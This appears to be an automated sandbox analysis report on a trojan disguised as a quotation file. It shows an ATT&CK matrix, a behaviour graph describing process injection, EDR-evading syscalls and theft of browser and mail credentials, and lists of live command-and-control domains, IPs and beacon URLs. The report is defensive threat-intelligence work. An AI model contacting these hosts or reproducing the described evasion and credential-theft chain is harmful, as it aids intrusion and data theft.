                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586807 Sample: QUOTATION#050125.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 28 www.furrcali.xyz 2->28 30 www.rpa.asia 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 QUOTATION#050125.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 SwDwSdNMaTt.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 cmdkey.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 SwDwSdNMaTt.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.furrcali.xyz 103.106.67.112, 49865, 49867, 49868 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 22->34 36 www.givvjn.info 47.83.1.90, 49837, 49838, 49839 VODANETInternationalIP-BackboneofVodafoneDE United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                QUOTATION#050125.exe100%AviraDR/AutoIt.Gen8
                QUOTATION#050125.exe63%ReversingLabsWin32.Trojan.AutoitInject
                QUOTATION#050125.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.rpa.asia/bwjl/0%Avira URL Cloudsafe
                http://www.ogbos88.cyou0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://www.ogbos88.cyou/kj1o/0%Avira URL Cloudsafe
                http://www.chiro.live/jwa9/0%Avira URL Cloudsafe
                http://www.furrcali.xyz/k29t/0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                http://www.bonheur.tech/t3iv/0%Avira URL Cloudsafe
                http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmE0%Avira URL Cloudsafe
                http://www.buyspeechst.shop/w98i/0%Avira URL Cloudsafe
                http://www.givvjn.info/nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                http://www.zbywl.com/js.js0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                http://www.100millionjobs.africa/cxj4/0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.nextlevel.finance/kgjj/0%Avira URL Cloudsafe
                http://www70.chiro.live/0%Avira URL Cloudsafe
                http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY0%Avira URL Cloudsafe
                http://www.rpa.asia/bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe0%Avira URL Cloudsafe
                http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNj0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
                http://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                http://www.nextlevel.finance/kgjj/?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                http://www.bonheur.tech/t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA=0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                http://www.givvjn.info/nkmx/0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                https://ogbos88vip.click0%Avira URL Cloudsafe
                http://www.bokus.site/qps0/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                http://www.mirenzhibo.net/wbfy/0%Avira URL Cloudsafe
                http://www.100millionjobs.africa/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc=0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                http://www.buyspeechst.shop/w98i/?6B-l7F=UfwHaNGeM7ohZqxLfFoMCRROWED3zeeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5VntXdX45GkikqbyqPY=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                http://www.lejgnu.info/gcvb/0%Avira URL Cloudsafe
                http://www.mirenzhibo.net/wbfy/?6B-l7F=Xeeb3ImT6ZQQytgApKylbK7mnw/Uy82KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPSWgMjv1orXfOBS8k1A=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/3u0p/0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                http://www.lejgnu.info/gcvb/?6B-l7F=R3JWUl3ivpsXcFtFFeliieQU9JuOkkLjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8IWqeYD/JQ6qTGavsAY=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                http://www.chiro.live/jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.rpa.asia
                		160.25.166.123
                		truetrue
                  		unknown
                  www.mirenzhibo.net
                  		202.95.11.110
                  		truetrue
                    		unknown
                    www.furrcali.xyz
                    		103.106.67.112
                    		truetrue
                      		unknown
                      www.milp.store
                      		194.9.94.85
                      		truetrue
                        		unknown
                        www.bonheur.tech
                        		13.248.169.48
                        		truetrue
                          		unknown
                          www.lejgnu.info
                          		47.83.1.90
                          		truetrue
                            		unknown
                            www.chiro.live
                            		45.33.2.79
                            		truetrue
                              		unknown
                              www.bokus.site
                              		199.192.21.169
                              		truetrue
                                		unknown
                                www.givvjn.info
                                		47.83.1.90
                                		truetrue
                                  		unknown
                                  www.mzkd6gp5.top
                                  		104.21.32.1
                                  		truetrue
                                    		unknown
                                    100millionjobs.africa
                                    		136.243.64.147
                                    		truetrue
                                      		unknown
                                      www.nextlevel.finance
                                      		13.248.169.48
                                      		truetrue
                                        		unknown
                                        www.ogbos88.cyou
                                        		172.67.132.227
                                        		truetrue
                                          		unknown
                                          www.buyspeechst.shop
                                          		104.21.32.1
                                          		truetrue
                                            		unknown
                                            www.elettrocoltura.info
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.100millionjobs.africa
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.smartbath.shop
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.rpa.asia/bwjl/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ogbos88.cyou/kj1o/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.chiro.live/jwa9/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.furrcali.xyz/k29t/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.buyspeechst.shop/w98i/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bonheur.tech/t3iv/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.givvjn.info/nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.100millionjobs.africa/cxj4/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nextlevel.finance/kgjj/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.rpa.asia/bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nextlevel.finance/kgjj/?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bonheur.tech/t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.givvjn.info/nkmx/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bokus.site/qps0/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mirenzhibo.net/wbfy/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.100millionjobs.africa/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.buyspeechst.shop/w98i/?6B-l7F=UfwHaNGeM7ohZqxLfFoMCRROWED3zeeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5VntXdX45GkikqbyqPY=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lejgnu.info/gcvb/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mirenzhibo.net/wbfy/?6B-l7F=Xeeb3ImT6ZQQytgApKylbK7mnw/Uy82KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPSWgMjv1orXfOBS8k1A=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mzkd6gp5.top/3u0p/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lejgnu.info/gcvb/?6B-l7F=R3JWUl3ivpsXcFtFFeliieQU9JuOkkLjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8IWqeYD/JQ6qTGavsAY=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.chiro.live/jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDktrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabcmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://push.zhanzhang.baidu.com/push.jscmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://static.loopia.se/responsive/images/iOS-72.pngcmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ogbos88.cyouSwDwSdNMaTt.exe, 00000007.00000002.293705525670.0000000000CE0000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEcmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://static.loopia.se/shared/logo/logo-loopia-white.svgcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwecmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.c.lencr.org/0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://c.pki.goog/r/r1.crl0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.zbywl.com/js.jscmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www70.chiro.live/SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYcmdkey.exe, 00000006.00000002.292818357888.0000000003CE6000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjcmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeSwDwSdNMaTt.exe, 00000007.00000002.293707698132.000000000451E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://static.loopia.se/shared/images/additional-pages-hero-shape.webpcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://static.loopia.se/shared/style/2022-extra-pages.csscmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://static.loopia.se/responsive/images/iOS-114.pngcmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://i.pki.goog/r1.crt0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://zz.bdstatic.com/linksubmit/push.jscmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://ocsp.rootca1.amazontrust.com0:firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
